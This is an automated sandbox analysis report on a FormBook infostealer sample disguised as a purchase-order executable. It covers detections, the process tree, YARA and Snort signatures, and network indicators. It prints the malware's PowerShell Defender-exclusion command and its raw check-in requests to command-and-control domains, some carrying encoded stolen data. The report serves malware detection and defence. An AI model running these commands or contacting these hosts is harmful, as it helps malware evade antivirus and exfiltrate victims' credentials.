Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO Copy_7854569.exe

Overview

General Information

Sample name:PO Copy_7854569.exe
Analysis ID:1446507
MD5:1a446464ce98784973a5e7bd13190a5b
SHA1:d4a5f07d3259338ec8ac7c84dc387dd0ea581b6b
SHA256:dcda4d5b1eba2327c178aad5f4237e22934841cd6d7ad116c2cb1622d6e9673b
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO Copy_7854569.exe (PID: 3648 cmdline: "C:\Users\user\Desktop\PO Copy_7854569.exe" MD5: 1A446464CE98784973A5E7BD13190A5B)
    • powershell.exe (PID: 4220 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PO Copy_7854569.exe (PID: 3560 cmdline: "C:\Users\user\Desktop\PO Copy_7854569.exe" MD5: 1A446464CE98784973A5E7BD13190A5B)
    • PO Copy_7854569.exe (PID: 1088 cmdline: "C:\Users\user\Desktop\PO Copy_7854569.exe" MD5: 1A446464CE98784973A5E7BD13190A5B)
      • sXAKgqpSAiGEzhyDsUSKBxPWz.exe (PID: 7128 cmdline: "C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • openfiles.exe (PID: 4432 cmdline: "C:\Windows\SysWOW64\openfiles.exe" MD5: 50BD10A4C573E609A401114488299D3D)
          • sXAKgqpSAiGEzhyDsUSKBxPWz.exe (PID: 7116 cmdline: "C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5756 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a540:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13b1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a540:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13b1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.PO Copy_7854569.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          6.2.PO Copy_7854569.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d953:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16f32:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          6.2.PO Copy_7854569.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            6.2.PO Copy_7854569.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2cb53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16132:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO Copy_7854569.exe", ParentImage: C:\Users\user\Desktop\PO Copy_7854569.exe, ParentProcessId: 3648, ParentProcessName: PO Copy_7854569.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe", ProcessId: 4220, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO Copy_7854569.exe", ParentImage: C:\Users\user\Desktop\PO Copy_7854569.exe, ParentProcessId: 3648, ParentProcessName: PO Copy_7854569.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe", ProcessId: 4220, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO Copy_7854569.exe", ParentImage: C:\Users\user\Desktop\PO Copy_7854569.exe, ParentProcessId: 3648, ParentProcessName: PO Copy_7854569.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe", ProcessId: 4220, ProcessName: powershell.exe

            Snort Signatures

            Timestamp:05/23/24-15:17:32.170290
            SID:2855465
            Source Port:53661
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:16:50.015697
            SID:2855465
            Source Port:53652
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:17:18.761145
            SID:2855465
            Source Port:53657
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:17:46.447712
            SID:2855465
            Source Port:53665
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/23/24-15:17:10.469533
            SID:2856318
            Source Port:53654
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: PO Copy_7854569.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.xn--bb55rtp-9va2p.store/a42m/?R0nl4=f64p&vH5=SpRmwiWWWie0LiCX9EyQXvy6lxMcCKfTuTRukl4i+K/mOSJ9++mgtoeJyEwnF13dco3p6AsQh3ikhhdZe62TUGOhYKvcqIkBTBlrJzQRtlxjx1oX6jajL6xfb2K92Bka0g==Avira URL Cloud: Label: malware
            Source: http://www.ratulunabet78.xyz/a42m/Avira URL Cloud: Label: malware
            Source: http://www.ratulunabet78.xyzAvira URL Cloud: Label: malware
            Source: http://www.xn--bb55rtp-9va2p.store/a42m/Avira URL Cloud: Label: malware
            Source: http://www.ratulunabet78.xyz/a42m/?vH5=98dQgeI97PpkPBwDNVDdt2fIP/8t+dN1kUHbH7cCS7ph4DK0k1WK4KE3/58PmNJa+S2FnMy9XFHjKVdPS0wRAwevARZLL3+cVCGRrbGhBpDtYSzj3TCwpxccczld+77x/A==&R0nl4=f64pAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: PO Copy_7854569.exeVirustotal: Detection: 45%Perma Link
            Source: PO Copy_7854569.exeReversingLabs: Detection: 68%
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.PO Copy_7854569.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.PO Copy_7854569.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4439108659.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4440623367.00000000045A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2119855099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2120310446.00000000014E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4438790270.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4442575534.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2122191823.0000000002E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: PO Copy_7854569.exeJoe Sandbox ML: detected
            Source: PO Copy_7854569.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: PO Copy_7854569.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: OpnFiles.pdb source: PO Copy_7854569.exe, 00000006.00000002.2120087862.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000003.2528143516.000000000069B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000002.4439886342.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000000.2205683578.0000000000AEE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO Copy_7854569.exe, 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000008.00000003.2141673668.000000000469F000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000008.00000003.2120507310.00000000044EB000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO Copy_7854569.exe, PO Copy_7854569.exe, 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000008.00000003.2141673668.000000000469F000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000008.00000003.2120507310.00000000044EB000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: OpnFiles.pdbGCTL source: PO Copy_7854569.exe, 00000006.00000002.2120087862.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000003.2528143516.000000000069B000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 8_2_0282B880 FindFirstFileW,FindNextFileW,FindClose,8_2_0282B880
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 4x nop then jmp 076EAAC2h0_2_076EAA76
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 4x nop then xor eax, eax8_2_028194B0

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:53652 -> 103.247.10.164:80
            Source: TrafficSnort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.5:53654 -> 162.240.81.18:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:53657 -> 162.240.81.18:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:53661 -> 162.0.237.22:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:53665 -> 84.32.84.32:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.crimsoncascade.xyz
            Source: DNS query: www.ratulunabet78.xyz
            Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
            Source: Joe Sandbox ViewIP Address: 162.0.237.22 162.0.237.22
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID RUMAHWEB-AS-IDRumahwebIndonesiaCVID
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /a42m/?R0nl4=f64p&vH5=6CH/YRMAK7aydmoZX4rE3aHTO96gtIC3593I/qH1Euv5gdtO1aVIaIsEnNz/XwGPewRjk6ONG4Ys+seqd2cELhY1N+SfeluTEbHos+Hkwv+a06EBMG8yJcZA+l8yWcOKFg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.gregoriusalvin.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?R0nl4=f64p&vH5=BaBbynwG2FaMiw+m+oe/pVgQl9HtQpBnPsDfKOVNrs70A5vduIAG3AN1jPdCIStIA9EjWNWwwUOGmupZW6v0AZj8SPVeonrFiOinbxCwnOWiWMOKy28ccO1L5nk/mSSCeg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.tintasmaiscor.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?vH5=OaCxij+az8CWZkVSgZ9BvYP+nrAHPzHJsZdPmSHU0RFVoK/pLfrBJ2MjeSz+pAxrgiF9enqzkwmMWhrDz0ZQ4sIJ7tOHf1xt78d5/aV4E0eta/TI3w61kMO4VihKAD9uew==&R0nl4=f64p HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.crimsoncascade.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?R0nl4=f64p&vH5=SpRmwiWWWie0LiCX9EyQXvy6lxMcCKfTuTRukl4i+K/mOSJ9++mgtoeJyEwnF13dco3p6AsQh3ikhhdZe62TUGOhYKvcqIkBTBlrJzQRtlxjx1oX6jajL6xfb2K92Bka0g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.xn--bb55rtp-9va2p.storeConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?vH5=TRa47sC0zg9DwlJApIa9TKXT0LmdSyPROaHr8XI2UWJs85O5KJ5vgIdD5G7YtksjxwnhYTkQf9KJFjTFonbd3AHZxsuWNHNjjLjlx6sM8JLXfuIwaQjmht/eByOeQ7cAZg==&R0nl4=f64p HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.fidyart.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?R0nl4=f64p&vH5=q82ug4hJ4iMW1QeZ+GCgoJbZS3jVtW+Vvu2ntYvjkNah5D8fKd1XYREKBHF28ngiXJtWR4/9FoDVe0EJ2zKZXh/HzsdFhnk2W05Rc4EGYuWHBokuuF9nEMUprlqBVZ4vog== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.leaflearn.storeConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?vH5=vQQIiwhFgpVoGnhhtc2P1VILfyaWtEv7qbiLczs1d6+poiTW6QrgALxDe+CMs+NuEeSHyk/V30WhMaxjncGhKZCgCMKVtFum7SXMM5CUlA+qFcg/x36UpY0MC+LaLW6wHA==&R0nl4=f64p HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.p65cq675did.shopConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?R0nl4=f64p&vH5=R4g0iLEn+5Q22eej6WVWFlCYkAtUsHnBzM8NBDsaFSaCgPmb2Z+2OZ+xqOKmenmNERVCqFgQJgmiG9oBky2gZW66+VsZINZo3qt/OX5zYEd5gmWOXPMaopeVLu+bZcefww== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.digitoxmarketing.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?R0nl4=f64p&vH5=nLiHY6ZlzAe25GxlmAxaMXLPD/QIkKTmL2k396ng4hoKCGGx5/R6Lgv+VE3CAus50oYKw0M+CtaS1Cqyitq9Qy6dvHCDxXkEGnRvDu59ECZqrIMOmhT00aeob0V7fCoJ5Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.6whebx.cyouConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /a42m/?vH5=98dQgeI97PpkPBwDNVDdt2fIP/8t+dN1kUHbH7cCS7ph4DK0k1WK4KE3/58PmNJa+S2FnMy9XFHjKVdPS0wRAwevARZLL3+cVCGRrbGhBpDtYSzj3TCwpxccczld+77x/A==&R0nl4=f64p HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enHost: www.ratulunabet78.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.designsbysruly.com
            Source: global trafficDNS traffic detected: DNS query: www.weeveno.com
            Source: global trafficDNS traffic detected: DNS query: www.gcashservice247.com
            Source: global trafficDNS traffic detected: DNS query: www.infomail.website
            Source: global trafficDNS traffic detected: DNS query: www.gregoriusalvin.com
            Source: global trafficDNS traffic detected: DNS query: www.italiangreyhounds.online
            Source: global trafficDNS traffic detected: DNS query: www.tintasmaiscor.com
            Source: global trafficDNS traffic detected: DNS query: www.crimsoncascade.xyz
            Source: global trafficDNS traffic detected: DNS query: www.xn--bb55rtp-9va2p.store
            Source: global trafficDNS traffic detected: DNS query: www.fidyart.com
            Source: global trafficDNS traffic detected: DNS query: www.leaflearn.store
            Source: global trafficDNS traffic detected: DNS query: www.p65cq675did.shop
            Source: global trafficDNS traffic detected: DNS query: www.digitoxmarketing.com
            Source: global trafficDNS traffic detected: DNS query: www.transformthedorm.com
            Source: global trafficDNS traffic detected: DNS query: www.6whebx.cyou
            Source: global trafficDNS traffic detected: DNS query: www.ratulunabet78.xyz
            Source: unknownHTTP traffic detected: POST /a42m/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.tintasmaiscor.comOrigin: http://www.tintasmaiscor.comContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 204Connection: closeReferer: http://www.tintasmaiscor.com/a42m/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 76 48 35 3d 4d 59 70 37 78 52 45 6f 32 6c 57 6d 71 78 79 72 78 75 79 2f 74 7a 38 76 6e 66 36 74 59 66 78 71 4b 66 65 54 43 2f 42 50 6a 34 76 74 41 36 2f 70 68 76 4d 4a 6f 53 31 44 33 38 56 2f 4d 68 31 58 62 49 63 6f 55 75 32 45 6e 51 62 32 6e 4f 39 65 49 66 4b 49 55 49 2f 36 42 74 55 34 39 6c 62 78 68 64 36 69 5a 6b 76 4b 72 4f 7a 71 56 65 69 4c 2f 33 34 41 55 2f 49 64 33 6b 67 77 73 77 72 77 64 64 31 37 59 38 4e 73 53 56 2b 4d 45 6f 76 65 4c 45 5a 39 5a 62 36 50 55 33 6d 32 70 50 33 54 55 6e 6d 61 7a 32 74 49 74 76 65 2f 2b 72 73 45 67 77 47 38 41 55 4c 59 65 62 61 66 44 6e 2f 36 36 5a 57 52 73 31 38 3d Data Ascii: vH5=MYp7xREo2lWmqxyrxuy/tz8vnf6tYfxqKfeTC/BPj4vtA6/phvMJoS1D38V/Mh1XbIcoUu2EnQb2nO9eIfKIUI/6BtU49lbxhd6iZkvKrOzqVeiL/34AU/Id3kgwswrwdd17Y8NsSV+MEoveLEZ9Zb6PU3m2pP3TUnmaz2tItve/+rsEgwG8AULYebafDn/66ZWRs18=
